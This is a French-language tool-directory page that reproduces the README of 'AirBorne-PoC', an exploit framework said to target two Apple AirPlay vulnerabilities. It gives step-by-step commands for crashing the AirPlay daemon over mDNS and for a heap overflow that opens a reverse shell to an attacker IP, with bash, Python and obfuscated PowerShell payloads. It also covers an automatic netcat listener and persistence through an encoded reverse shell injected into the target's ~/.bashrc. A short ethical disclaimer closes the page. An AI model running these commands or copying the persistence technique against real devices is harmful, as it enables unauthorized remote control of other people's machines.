Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
AirBorne-PoC — poc pour CVE-2025-24252 & CVE-2025-24132 | Kitploit
Outils/GitHubGitHub/ekomssavior/airborne-poc
Mécanismes de PersistanceAnalyse des VulnérabilitésExploitationShellcodePost-ExploitationCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges UtilesExploitation de Binaires
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc pour CVE-2025-24252 & CVE-2025-24132

1642743il y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

AirBorne PoC Framework – Édition Elite RCE

Framework PoC complet pour CVE-2025-24252 & CVE-2025-24132
Par ekomsSavior |

AirBorne est un framework de preuve de concept (PoC) combiné ciblant deux vulnérabilités graves dans le service AirPlay d'Apple. Il comprend un déclencheur de crash complet et un exploit de shell inversé fonctionnel avec persistance optionnelle, écouteur et plusieurs formats de payload — le tout dans un seul script.

Vous cherchez la version originale ?
L'édition héritée est toujours disponible dans la branche legacy de ce dépôt.
Pour la consulter :

root@kitploit:~
git checkout legacy

CVEs couvertes

CVE-2025-24252 – mDNS TXT Record Crash

  • Déclenche un crash dans le démon AirPlayReceiver via un paquet mDNS malformé
  • Fonctionne via diffusion UDP sur le port 5353

CVE-2025-24132 – Heap Overflow → Shell inversé (RCE)

  • Déclenche un heap overflow dans le service TCP d'AirPlay sur le port 7000
  • Prend en charge les payloads de shell inversé bash, python et PowerShell
Télécharger l’outil
  • Inclut une persistance optionnelle via injection dans .bashrc (Linux)

  • Pour commencer

    1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. Installer les dépendances

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    Guide d'exécution

    Le script unique airborne.py inclut les deux PoCs et toute la logique :

    • Sélectionnez une CVE avec --exploit
    • Définissez un payload de shell inversé avec --payload
    • Démarre automatiquement un écouteur netcat pour vous
    • Active optionnellement la persistance sur la cible avec --persistent

    Exemples d'utilisation

    Cibler un crash avec un paquet mDNS (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    Nécessite une interface en mode moniteur.


    Lancer Heap Overflow → RCE (CVE-2025-24132)

    Lancer l'exploit complet avec le shell bash par défaut :

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    Choisir plutôt le shell Python :

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Activer la persistance réelle sur les cibles Linux :

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    Injection de commande shell uniquement

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    Options de payload

    PayloadDescription
    bashShell inversé bash par défaut sur TCP
    pythonShell inversé basé sur Python utilisant socket et pty
    powershellPayload RCE Windows PowerShell complet (obfusqué)

    Mode persistance

    Lors de l'utilisation de --persistent, le script ajoutera le payload de shell inversé encodé au fichier suivant de la cible :

    root@kitploit:~
    ~/.bashrc
    

    Cela garantit qu'un shell vous est retourné à chaque connexion de l'utilisateur ou ouverture d'un terminal.


    Notes de maintenance

    • Les shells inversés sont encodés avec base64 et délivrés après le débordement de tampon
    • Tous les payloads sont envoyés via le port 7000
    • Les paquets mDNS transitent par UDP 5353 et nécessitent une autorisation de socket brute
    • Assurez-vous que l'IP de votre machine d'attaque est accessible par l'appareil cible
    • Le script gère les cas d'erreur basiques et échoue silencieusement si les ports sont fermés

    Avertissement éthique

    Ce projet est destiné uniquement à la recherche éducative, éthique et autorisée.

    • Vous devez avoir une autorisation explicite pour tester le système cible.
    • Vous assumez l'entière responsabilité de toute action entreprise.

    L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique.


    Crédits

    • Construit par ekomsSavior
    • Inspiré par des CVE réelles et la recherche en développement d'exploits